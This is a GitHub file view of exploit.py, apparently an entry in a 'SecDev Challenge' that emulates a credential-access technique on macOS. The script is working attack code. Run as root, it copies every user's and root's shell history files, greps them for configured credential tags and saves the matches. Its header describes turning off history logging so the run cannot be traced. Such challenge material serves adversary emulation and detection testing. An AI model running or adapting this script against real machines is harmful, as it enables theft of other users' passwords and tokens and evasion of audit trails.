forked from nicholasaleks/SecDev-Test
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathexploit.py
190 lines (167 loc) · 5.45 KB
/
exploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
# The SecDev Challenge
#
# Authtor: Fahad Khan
#
# PRE-CONDITIONS:
# Operating System = "MacOS"
#
# EXECUTION of ATTACK:
# Technique = "Bash History"
# Tactic = "Credential Access"
# Assumptions = "User has access to all users .bash_history file. Should run as root"
#
# POST CONDITIONS/VALIDATION CHECK:
# Check number of bash history files in EXPLOIT_HOME/bash_history_files folderand the results file for any
# credential/tag information
#
# CLEANUP:
# There is no cleanup required as this exploit does not change any of users/os settings.
# We disable history logging before running this exploit so that no one can track it later from its own user history,
# and enable it after.
#
import os
import argparse
import logging
import json
import subprocess
from shutil import copy2
LOG = logging.getLogger(__name__)
EXPLOIT_HOME = ''
EXPLOIT_TAGS = ''
LOG_FILENAME = ''
OUTPUT_FILENAME = ''
def get_argparser():
parser = argparse.ArgumentParser(description='Process some integers.')
parser.add_argument('--log-level',
default="DEBUG",
help='Set the log level',
choices=["DEBUG", "INFO", "WARN", "ERROR"]
)
parser.add_argument('--config-file',
default="./config.json",
help='set the json config file name'
)
return parser
def get_users():
"""
Returns a list of usernames in /Users directory besides Shared
"""
logging.info('Getting users...')
cmd = "ls -1 /Users | grep -v Shared"
ps = subprocess.Popen(cmd,shell=True,stdout=subprocess.PIPE,stderr=subprocess.STDOUT)
users = ps.communicate()[0].splitlines()
#users.append('root')
return users
def start_exploit():
"""
Main method which carries out the exploit.
1) Get Users
2) Get their Bash history
3) Examine for predefined tags in bas files
Returns 0 if successful or -1 for failures
"""
users = get_users()
if not users:
logging,info('No users found in /Users directory')
return -1
logging.debug("List of users:"+str(users))
logging.info(str(len(users))+" user/users found")
ret = get_bash_history(users)
if ret == 0:
ret = examine_bash_history()
return ret
def get_bash_history(users):
"""
Copy bash history files for users
Returns 0 if successful and -1 for failure
"""
logging.info('Getting users bash history...')
Destdir = EXPLOIT_HOME+'/bash_history_files'
for user in users:
cmd = "echo ~" + user + "/.bash_history"
ps = subprocess.Popen(cmd,shell=True,stdout=subprocess.PIPE,stderr=subprocess.STDOUT)
files = ps.communicate()[0].splitlines()
logging.debug(files)
for file in files:
if not os.path.exists(Destdir):
logging.info('Creating dir:'+Destdir)
os.makedirs(Destdir)
try:
copy2(file,Destdir+"/"+user+".bash_history")
except IOError:
logging.error('Insufficient permissions: Could not copy file '+file)
try:
copy2('/var/root/.sh_history',Destdir+"/root"+".bash_history")
except IOError:
logging.error('Insufficient permissions: Could not copy file /var/root/.*history')
cmd = "ls -1 " + Destdir
ps = subprocess.Popen(cmd,shell=True,stdout=subprocess.PIPE,stderr=subprocess.STDOUT)
files = ps.communicate()[0].splitlines()
if not files:
logging.info('No bash files copied')
return -1
else:
logging.info(str(len(files))+" file/files copied")
return 0
def examine_bash_history():
"""
Searches the tags in bash history files and writes output to output file
"""
logging.info('Examining bash history files...')
commands = []
tags = EXPLOIT_TAGS.split('|')
logging.info('Tags:'+str(tags))
for tag in tags:
cmd = "grep " + tag + " " + EXPLOIT_HOME + "/bash_history_files/*"
ps = subprocess.Popen(cmd,shell=True,stdout=subprocess.PIPE,stderr=subprocess.STDOUT)
lines = ps.communicate()[0].splitlines()
#print(tag,lines)
if lines:
commands.append(lines)
logging.debug("Commands:"+str(commands))
if commands:
try:
file = open(EXPLOIT_HOME+"/"+OUTPUT_FILENAME,"w")
for tag in commands:
for cmd in tag:
file.write(cmd)
file.write('\n')
file.close
except Exception as e:
logging.error('Exception occured while writing to results file.'+e.errno+'\n'+e.message)
else:
logging.info('No tags found in bash history')
return 0
def verify_exploit(ret):
if ret == 0:
logging.info("Exploit is Successful! Please examine results at:"+EXPLOIT_HOME+"/"+OUTPUT_FILENAME)
else:
logging.error("Exploit failed! Please check the logs at:"+EXPLOIT_HOME+"/"+LOG_FILENAME)
def main():
parser = get_argparser()
args = parser.parse_args()
#print(args.config_file)
with open(args.config_file, 'r') as f:
config = json.load(f)
global EXPLOIT_HOME
EXPLOIT_HOME = config['CONFIG']['EXPLOIT_HOME']
global EXPLOIT_TAGS
EXPLOIT_TAGS = config['CONFIG']['EXPLOIT_TAGS']
global LOG_FILENAME
LOG_FILENAME = config['CONFIG']['LOG_FILENAME']
global OUTPUT_FILENAME
OUTPUT_FILENAME = config['CONFIG']['OUTPUT_FILENAME']
logging.basicConfig(level=args.log_level, format="[%(asctime)s] [%(levelname)s] %(message)s",filename=EXPLOIT_HOME+'/'+LOG_FILENAME)
logging.info('------ CONFIGS -----------')
logging.info('EXPLOIT_HOME = '+EXPLOIT_HOME)
logging.info('EXPLOIT_TAGS ='+EXPLOIT_TAGS)
logging.info('LOG_FILENAME = '+LOG_FILENAME)
logging.info('OUTPUT_FILENAME = '+OUTPUT_FILENAME)
logging.info('-------------------------')
logging.info('Starting exploit....')
ret = start_exploit()
logging.info('Exploit complete!')
verify_exploit(ret)
#cleanup()
if __name__ == "__main__":
main()